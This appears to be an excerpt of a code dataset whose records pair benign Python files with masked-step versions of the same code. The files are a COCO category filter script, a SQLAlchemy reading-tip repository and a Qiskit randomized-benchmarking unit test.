category_names = ["sports ball", "cell phone", "couch", "elephant", "tie", "spoon", "skis", "apple", "giraffe", "laptop", "tennis racket", "sink", "dog", "fork", "cat", "teddy bear", "train", "skateboard", "toilet", "sandwich", "bed", "keyboard", "baseball glove", "baseball bat", "airplane", "oven", "hot dog", "refrigerator", "frisbee", "mouse", "fire hydrant", "stop sign", "bear", "snowboard", "parking meter", "toothbrush", "microwave", "scissors", "hair drier", "toaster"]
json_coco = json.load(ann_file)
new_json = deepcopy(json_coco)
for ann in json_coco['annotations']:
if return_cat_name(json_coco, ann['category_id']) in category_names:
new_json['annotations'].remove(ann)
for cat in json_coco['categories']:
if cat['name'] in category_names:
new_json['categories'].remove(cat)
output = open(args.out_file, "w")
json.dump(new_json, output)
output.close()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "467327b98ab99bdad429943c701c751be4f67940",
"index": 9378,
"step-1": "<mask token>\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print('Categoria não encontrada: ', category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print('Categoria não encontrada: ', category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import json\nimport sys\nfrom copy import deepcopy\nfrom argparse import ArgumentParser\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print('Categoria não encontrada: ', category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import json\nimport sys\nfrom copy import deepcopy\nfrom argparse import ArgumentParser\n\n# TODO: Ord category's IDs after deletion\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print(\"Categoria não encontrada: \", category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(\n description='Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n\n ann_file = open(args.json_file_path)\n category_names = [\"sports ball\", \"cell phone\", \"couch\", \"elephant\", \"tie\", \"spoon\", \"skis\", \"apple\", \"giraffe\", \"laptop\", \"tennis racket\", \"sink\", \"dog\", \"fork\", \"cat\", \"teddy bear\", \"train\", \"skateboard\", \"toilet\", \"sandwich\", \"bed\", \"keyboard\", \"baseball glove\", \"baseball bat\", \"airplane\", \"oven\", \"hot dog\", \"refrigerator\", \"frisbee\", \"mouse\", \"fire hydrant\", \"stop sign\", \"bear\", \"snowboard\", \"parking meter\", \"toothbrush\", \"microwave\", \"scissors\", \"hair drier\", \"toaster\"]\n\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n\n output = open(args.out_file, \"w\")\n json.dump(new_json, output)\n output.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from models.readingtip import ReadingTip
from database import db
class ReadingTipRepository:
def __init__(self):
pass
def get_tips(self, user, tag="all"):
if tag == "all":
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
def get_tip(self, tip_id):
return ReadingTip.query.get(tip_id)
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({"read":date})
db.session.commit()
readingtip_repository = ReadingTipRepository()
|
normal
|
{
"blob_id": "d82b68d5c83ae538d7a8b5ae5547b43ac4e8a3d4",
"index": 6910,
"step-1": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n <mask token>\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n <mask token>\n <mask token>\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-4": "from models.readingtip import ReadingTip\nfrom database import db\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-5": "from models.readingtip import ReadingTip\nfrom database import db\n\nclass ReadingTipRepository:\n def __init__(self):\n pass\n\n def get_tips(self, user, tag=\"all\"):\n if tag == \"all\":\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({\"read\":date})\n db.session.commit()\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-ids": [
4,
7,
9,
11,
12
]
}
|
[
4,
7,
9,
11,
12
] |
# -*- coding: utf-8 -*-
# Copyright 2019, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=undefined-loop-variable
"""
Run through RB for different qubit numbers to check that it's working
and that it returns the identity
"""
import unittest
import random
import qiskit
import qiskit.ignis.verification.randomized_benchmarking as rb
class TestRB(unittest.TestCase):
""" The test class """
@staticmethod
def choose_pattern(pattern_type, nq):
'''
Choose a valid field for rb_opts['rb_pattern']
:param pattern_type: a number between 0 and 2.
0 - a list of all qubits, for nq=5 it is
[1, 2, 3, 4, 5]
1 - a list of lists of single qubits, for nq=5
it is [[1], [2], [3], [4], [5]]
2 - randomly choose a pattern which is a list of
two lists, for example for nq=5 it can be
[[4, 1, 2], [5, 3]]
:param nq: number of qubits
:return: the pattern or None
Returns None if the pattern type is not relevant to the
number of qubits, i.e,, one of two cases:
pattern_type = 1 and nq = 1, which implies [[1]]
pattern_type = 2 and nq <= 2: - for nq=1 this is impossible
- for nq=2 this implies
[[1], [2]], which is already
tested when pattern_type = 1
'''
if pattern_type == 0:
res = [list(range(nq))]
elif pattern_type == 1:
if nq == 1:
return None
res = [[x] for x in range(nq)]
else:
if nq <= 2:
return None
shuffled_bits = list(range(nq))
random.shuffle(shuffled_bits)
split_loc = random.randint(1, nq-1)
res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]
return res
@staticmethod
def choose_multiplier(mult_opt, len_pattern):
'''
:param multi_opt:
0: fixed length
1: vector of lengths
:param len_pattern: number of patterns
:return: the length multiplier
'''
if mult_opt == 0:
res = 1
else:
res = [i + 1 for i in range(len_pattern)]
return res
def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):
'''
For a single sequence, verifies that it meets the requirements:
- Executing it on the ground state ends up in the ground state
- It has the correct number of Cliffords
- It fulfills the pattern, as specified by rb_patterns and
length_multiplier
:param circ: the sequence to check
:param nq: number of qubits
:param rb_opts: the specification that generated the set of sequences
which includes circ
:param vec_len: the expected length vector of circ (one of
rb_opts['length_vector'])
:param result: the output of the simulator
when executing all the sequences on the ground state
:param shots: the number of shots in the simulator execution
'''
if not hasattr(rb_opts['length_multiplier'], "__len__"):
rb_opts['length_multiplier'] = [
rb_opts['length_multiplier'] for i in range(
len(rb_opts['rb_pattern']))]
ops = circ.data
op_index = 0
# for each cycle (the sequence should consist of vec_len cycles)
for _ in range(vec_len):
# for each component of the pattern...
for pat_index in range(len(rb_opts['rb_pattern'])):
# for each Clifford...
for _ in range(rb_opts['length_multiplier'][pat_index]):
# for each basis gate...
while ops[op_index].name != 'barrier':
# Verify that the gate acts on the correct qubits
# This happens if the sequence is composed of the
# correct sub-sequences, as specified by vec_len and
# rb_opts
self.assertTrue(
all(x[1] in rb_opts['rb_pattern'][pat_index]
for x in ops[op_index].qargs),
"Error: operation acts on incorrect qubits")
op_index += 1
# increment because of the barrier gate
op_index += 1
# check if the ground state returns
self.assertEqual(result.
get_counts(circ)['{0:b}'.format(0).zfill(nq)], shots,
"Error: %d qubit RB does not return the \
ground state back to the ground state" % nq)
def test_rb(self):
""" Main function of the test """
# Load simulator
backend = qiskit.Aer.get_backend('qasm_simulator')
# Test up to 2 qubits
nq_list = [1, 2]
for nq in nq_list:
print("Testing %d qubit RB" % nq)
for pattern_type in range(2):
for multiplier_type in range(2):
# See documentation of choose_pattern for the meaning of
# the different pattern types
rb_opts = {}
rb_opts['nseeds'] = 3
rb_opts['length_vector'] = [1, 3, 4, 7]
rb_opts['rb_pattern'] = self.choose_pattern(
pattern_type, nq)
# if the pattern type is not relevant for nq
if rb_opts['rb_pattern'] is None:
continue
rb_opts['length_multiplier'] = self.choose_multiplier(
multiplier_type, len(rb_opts['rb_pattern']))
# Generate the sequences
try:
rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)
except OSError:
skip_msg = ('Skipping tests for %s qubits because '
'tables are missing' % str(nq))
print(skip_msg)
continue
# Perform an ideal execution on the generated sequences
# basis_gates = ['u1','u2','u3','cx'] # use U, CX for now
# Shelly: changed format to fit qiskit current version
basis_gates = 'u1, u2, u3, cx'
shots = 100
result = []
for seed in range(rb_opts['nseeds']):
result.append(
qiskit.execute(rb_circs[seed], backend=backend,
basis_gates=basis_gates,
shots=shots).result())
# Verify the generated sequences
for seed in range(rb_opts['nseeds']):
length_vec = rb_opts['length_vector']
for circ_index, vec_len in enumerate(length_vec):
self.assertEqual(
rb_circs[seed][circ_index].name,
'rb_seed_%s_length_%s' % (
str(seed), str(vec_len)),
'Error: incorrect circuit name')
self.verify_circuit(rb_circs[seed][circ_index],
nq, rb_opts,
vec_len, result[seed], shots)
self.assertEqual(circ_index, len(rb_circs),
"Error: additional circuits exist")
def test_rb_utils(self):
""" Test some of the utility calculations, e.g.
coherence limit"""
t1 = 100.
t2 = 100.
gate2Q = 0.5
gate1Q = 0.1
twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1],
[t2, t2], gate2Q)
oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1],
[t2], gate1Q)
self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,
"Error: 1Q Coherence Limit")
self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,
"Error: 2Q Coherence Limit")
twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5],
[0, 1, -1],
[0.001, 0.0015, 0.02])
self.assertAlmostEqual(twoq_epc, 0.0446283, 6,
"Error: 2Q EPC Calculation")
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "995e42312e286d82fa101128795d8aa60c1a6548",
"index": 4203,
"step-1": "<mask token>\n\n\nclass TestRB(unittest.TestCase):\n <mask token>\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n 